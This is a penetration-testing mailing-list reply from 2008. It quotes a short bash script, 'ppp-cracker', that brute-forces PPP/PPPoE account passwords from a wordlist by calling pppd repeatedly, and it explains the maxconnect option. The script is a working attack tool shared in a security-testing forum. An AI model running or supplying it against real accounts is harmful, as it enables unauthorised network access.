Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: PPP authentication brute-force attack?

From: Bartos-Elekes Zsolt <muszi () kite hu>
Date: Thu, 14 Feb 2008 15:30:43 +0100
Matheus Michels wrote:


This is exactly what I wanted. I made this little script based on yours:

#!/bin/bash

SETSID=/usr/bin/setsid
PPPD=/usr/sbin/pppd
PPPOE=/usr/sbin/pppoe

PPPD_OPTIONS="noipdefault noauth default-asyncmap defaultroute hide-password nodetach usepeerdns mtu 1492 mru 1492 noaccomp 
noccp nobsdcomp nodeflate nopcomp novj novjccomp lcp-echo-interval 30 lcp-echo-failure 3 pap-max-authreq 2 pap-restart 3 
maxconnect 5"
PPPOE_OPTIONS="-I eth0"

PASSWORDS=/home/matheus/pass.txt

if test "$1" = "" ; then
    echo "$0: Usage: ppp-cracker user">& 2
    exit 1
fi

while read passwd; do
   $SETSID $PPPD pty "$PPPOE $PPPOE_OPTIONS" $PPPD_OPTIONS user "$1" password "$passwd"
      if [ $? -eq 0 ]; then
           echo "Found password: $passwd"
           break
      fi
done < $PASSWORDS


I've copied some parts from the adsl-start and adsl-connect scripts. Actually, the script
> is not functional yet. It authenticates and, some seconds later, exits with an input/output error. > But I'm doing some changes based on the scripts shipped with RP-PPPOE and I'm almost getting the 
> script to work.
We are setting maxconnect to 5 seconds, so our pppd closes the connection. If you don't want that, don't use the maxconnect parameter. 

--
Zsolt

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: